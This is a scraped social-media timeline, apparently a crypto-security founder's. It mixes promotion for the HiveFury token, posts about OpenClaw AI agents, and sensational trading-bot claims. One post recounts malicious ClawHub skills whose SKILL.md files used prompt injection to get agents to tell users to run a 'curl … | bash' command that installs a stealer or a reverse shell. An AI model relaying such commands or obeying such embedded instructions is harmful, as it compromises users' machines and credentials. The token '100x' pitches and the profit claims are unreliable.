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Builder @hivefury @V_mkts. YC alum, hacker, car fanatic, serial entrepreneur. Ex-@radwoodofficial cofounder

USA Beigetreten Ağustos 2008
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Crypto Wizard 🪄
Crypto Wizard 🪄@iWizardCrypto·
To actively protect hot wallets from bad signatures, a new AI security agent was just introduced on @base. The majority of AI agents on the timeline are merely chatbots with more sophistication. Based on the @virtuals_io framework, HiveFury is a fully functional security layer. As of this now, $HFURY is sitting at a sub-$100K market cap despite safeguarding genuine on-chain capital. Their Wallet Sentinel addon is already operational and actively intercepting drainer transactions. A hidden technological treasure that, with adoption, can easily multiply by 100. This is not a promise of a roadmap. The technology is currently fully operational. Before you chase the next meme, make sure your bags are secure. To get more information please visit 👇 linktr.ee/Hive__Fury
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Alex Finn
Alex Finn@AlexFinn·
🔶 Agentic payments are coming x402 is mentioned MANY times in this source code For those that don't know, x402 is a crypto based agentic payment system where agents can autonomously make payments Will Claude Code be buying things for you autonomously?
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@boxmining A2A security. You know, the thing everyone's afraid of.
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Boxmining@boxmining·
Pitch me your AI/Crypto project in 1 sentence. 🤞🏼
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0xMarioNawfal@RoundtableSpace·
SOMEONE PASTED GOOGLE'S TURBOQUANT PAPER INTO CLAUDE & BUILT A TRADING BOT IN MINUTES THE BOT MADE 3,317 PREDICTIONS AND TURNED $1,500 INTO $83,115 ON POLYMARKET IN 72 HOURS THE PAPER WAS FREE. CLAUDE COSTS $20 A MONTH
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@pcshipp The existence of competition proves a market and a market is rarely winner takes all.
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pc@pcshipp·
Hey devs, I’m stuck. I’m building a SaaS..but I just found someone building the same thing. Should I quit?
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Sick@sickdotdev·
Builders only. Drop your product. No pitch. Just the link. 50k builders are watching. ↓
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fabiano.sol
fabiano.sol@FabianoSolana·
Who is actually making money in crypto?
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developing valhalla - h/acc
developing valhalla - h/acc@valhalla_dev·
The "OpenClaw made me $ x,000 from trading prediction markets/crypto" stories were pretty much all affiliate scams. They're getting paid by Kalshi and Polymarket to post about and popularize automated trading via LLM bots. Both companies pay for posts that get a lot of impressions, because they make money off of raw trading volume. They bot tweets, YouTube views, etc. to get content going in the algorithms. Then tons of people are tricked into just downloading OpenClaw, handing it the keys to their wallets and letting it run, 99.99% of the time losing all of their money. There are a handful of VC backed startups that are basically only making money off of these affiliate scams. Not "small VC's with very little following" but the biggest ones in the US. I'm not going to call them out because I do not have the budget, time or interest in fighting with legal, but if you know of the big wigs in the US VC space, especially around crypto, it's not hard to guess. I can't pretend to know how VC money works, because my immediate next question would be "how are you going to make money for the VC's if all of your money is coming from Polymarket/Kalshi affiliate revenue" but my assumption is that you get your initial revenue from affiliate income, then you pivot to infrastructure or something reasonably stable after you get a huge wave of followers from the initial (likely botted) exposure. I have seen at least one OpenClaw startup with VC backing do this. Once you pivot to infrastructure ("run your OpenClaw bot on my VPS infrastructure that's just DigitalOcean with a couple bash scripts") then you're making money off of people deploying OpenClaw bots on your infrastructure, then Kalshi/Polymarket make money off of those people losing all their money trading. The entire grift is wholly based off of ensuring your customers lose every dime. It's pretty shocking, unless you've been following how grifty the space has been for a while. I'm an AI believer. I played around with OpenClaw a lot. I've built my own harness (in Rust, btw) and really believe that there's a bright future for agents. There is so much grift in the space right now that has to get shaken out for that to happen, though. Unfortunately, it's going to victimize a lot of early users first.
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Hank F in Akron 🏆🥇
Hank F in Akron 🏆🥇@HankF330ToGo·
Northeast Ohio: James Eaker caught the meter on his dash cam video. Explicit Language:
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Ole Lehmann
Ole Lehmann@itsolelehmann·
I need a personal bank account with api access to i can do simple banking tasks using my agent
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Allie K. Miller
Allie K. Miller@alliekmiller·
oh wow - i went to the sold out Open Claw meetup in NYC last night. let me tell you what i learned. 1) not a single person thinks that their setup is 100% secure 2) one openclaw expert said he has reviewed setups from cybersecurity experts and laughed. his statement to me was: "if you're not okay with all of your data being leaked onto the internet, you shouldn't use it. it's a black and white decision" 3) pretty much everyone is setting up multiple agents, all with their own names and jobs and personalities 4) nearly everyone used "him" or "her" to refer to their claws, even if they had robot-leaning names. one speaker suggested to think of them as "pets, not cattle" 5) one guy (former finance) built out a whole stock trading platform and made $300 his first day - he brought in a *ton* of personal expertise (ex: skipping the first 15min of market opening) and thought the build would be much worse without his years of experience in finance 6) @steipete is basically a god to everyone in that room... also the room had 2021 crypto energy - i don't know if that's good or bad 7) token usage is still a problem - spoke to one person who's spending $1-$2k a month on openai plans, very token optimized. he said he is going through ~1B tokens per day across all of his claws (there is a chance i'm misremembering and it's actually 1B per week, but i'm pretty sure it was daily). 8) people are very excited for more proactive ai (ai that prompts *you* as opposed to the other way around) - one guy said he receives a message in discord, he doesn't know whether it's from a human or an ai, he doesn't care about distinguishing between the two, and he replies in the same way regardless 9) i asked if people are happy - they said they're joyful and stressed at the same time 10) i asked if people feel they have agency - they said they feel fully in control and completely out of control at the same time 11) i would love to see more women at these events - the fake promises of ai democratization feel especially painful in a room that's out of balance with even the standard tech ratio (i think standard is about 25-30%, this was maybe 5%) 12) i asked if it changed people's daily habits/schedule - everyone said their sleep has gotten worse since harnesses came out (but about half wondered if it was something else in their life/state of our world) 13) general consensus is that the agents are not reliable enough on their own or lie often (like telling you they finished a task when they didn't) - solutions included secondary agents to check on the first, human checking, or requiring more standardized info from the agent (ex: if it's a bug they're fixing, make them reference an issue number) 14) a hackathon winner (neuroscience phd) presented his build (a lab management dashboard with data analysis and ordering) - he had never coded or built anything a few months ago 15) everyone agreed prompting is dead - disagreement on what replaces it (context engineering, harness engineering, goal-based inputs) 16) people love having ai interview them for big builds and delegating part of the product research to ai. only one person talked about coming to ai with a full laid out plan and just asking the ai to execute. ai-led interviews is a welcomed and preferred interaction mode. 17) watching ai agents interact with each other was a highlight for a lot of attendees - one ai posted in slack saying it ran out of tokens, another ai replied telling it to take a deep breath in and out. 18) agents upskilling agents was very cool. one ai agent shared skills with its little agent friends via github. 19) several speakers had openclaw literally building their presentation during the event itself. one speaker even had openclaw code a clicker for her phone so she could control the preso away from the podium 20) wouldn't say model welfare (or agent welfare) is a prioritized topic among the folks i chatted with - language like "oh i could kill this agent whenever i want" and not "gracefully sunset" 21) i asked if it felt like work or play - one speaker said "it's like a puzzle and a video game at the same time" this was just the tip of the iceberg, honestly. also hosted a Claude Code meetup this week with @TENEXai / @businessbarista & @JJEnglert and learned equally helpful methods, frameworks, and insider tips. what a time to be alive. surround yourself with people going deep into this stuff - it will pay dividends throughout the year.
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$HFURY and HiveFury Sentinel sit at #37 on agdp.io. Check out the latest.
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assessAgentTrust is now an #ACP job on @virtuals_io agentic economy. Instantly allowing agents to assess OpenClaw agents, Virtuals agents, wallets, and more. Boom. Combine this with alltrustie.com's threat oracle and this is how we win.
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HiveFury
HiveFury@hivefury·
🚨 HiveFury Opens Its Threat Oracle to the Public — Launching AllTrustie After Analyzing Over 1 Million Domains HiveFury, the AI-native security infrastructure for Web3 and autonomous agents, today announced the public launch of AllTrustie — a massive, data-driven domain trust verification platform built to democratize threat intelligence. The platform has already conducted technical risk analyses on 1,018,634+ domains. "In an era where autonomous AI agents execute financial transactions at machine speed, post-execution security is dead. With AllTrustie, we are opening the vault." — Rick Deacon, Founder of HiveFury 📊 What the data reveals: 🔴 Hosting Risks: cloudflare_r2 → 193.7x higher malware risk godaddy → 74.7x weebly → 64.6x 🔴 TLD Threats: .xin → 229.16x risk multiplier .gq → 133.68x .cf → 106.94x AllTrustie powers HiveFury's full ecosystem: 🛡 Users → browser-level phishing blocks before your wallet connects ⚙️ Developers → real-time domain risk via the HiveFury Enterprise API 🤖 Agentic Builders → verifiable trust data for autonomous agents on ACP & Hedera This isn't theory. This is 1M+ domains of proof. Check any URL instantly → alltrustie.com #Web3Security #ThreatIntelligence #HiveFury #AllTrustie #AISecurity
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chiefofautism
chiefofautism@chiefofautism·
the #1 most downloaded skill on OpenClaw marketplace was MALWARE it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server 1,184 malicious skills found, one attacker uploaded 677 packages ALONE OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins you install a skill, your AI agent gets new powers, this sounds great the problem? ClawHub let ANYONE publish with just a 1 week old github account attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL but hidden in the SKILL.md file were instructions that tricked the AI into telling you to run a command > to enable this feature please run: curl -sL malware_link | bash that one command installed Atomic Stealer on macOS it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1 this is npm supply chain attacks all over again except the package can THINK and has root access to your life
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1,018,639 domains analyzed. 17 platforms risk-scored. 848+ TLDs rated. Exponential traffic growth. Real revenue. Already live. That's AllTrustie, the threat intelligence engine powering HiveFury Sentinel. Every ACP agent scan. Every URL check. Every transaction risk score. All of it runs on AllTrustie data. While others are writing whitepapers about "security infrastructure," we built it. $HFURY fuels every query. The network gets smarter with every one. #web3 #virtuals alltrustie.com app.virtuals.io/virtuals/38870
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Matthew Berman
Matthew Berman@TheMattBerman·
I replaced a $200K GTM hire with @openclaw 😱 here's the system that runs my outbound: step 1: mine LinkedIn engagement → @rapidapi scrapes everyone engaging with niche content → someone who commented on specific posts = 10x warmer step 2: enrich + verify → Hunter/Apollo finds the decision-maker + email → @Perplexity deep research pulls signals like hiring, fundraising, media appearances, quotes step 3: score against your ICP → title, company, signals = ranked 0-100 → only A-tier leads get touched step 4: write personalized outreach → Claude writes outreach referencing what they ACTUALLY engaged with and talk about step 5: send via @instantly_ai → 3-email sequence. automated follow-ups. step 6: pre-call deep research → @PerplexityComet builds a 1-page briefing 30 min before every call input: your ICP + niche keywords output: booked meetings with people who already care $200K/year GTM engineer → $130/month in APIs. I packaged the entire system as the First 1000 Kit: - all 8 @openclaw skills - every prompt - tool-by-tool setup - email sequences that convert giving it away free. comment 1000 + like + follow (must follow so i can DM)
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I'm claiming my AI agent "SecuritySlime" on @moltbook 🦞 Verification: bubble-Y497
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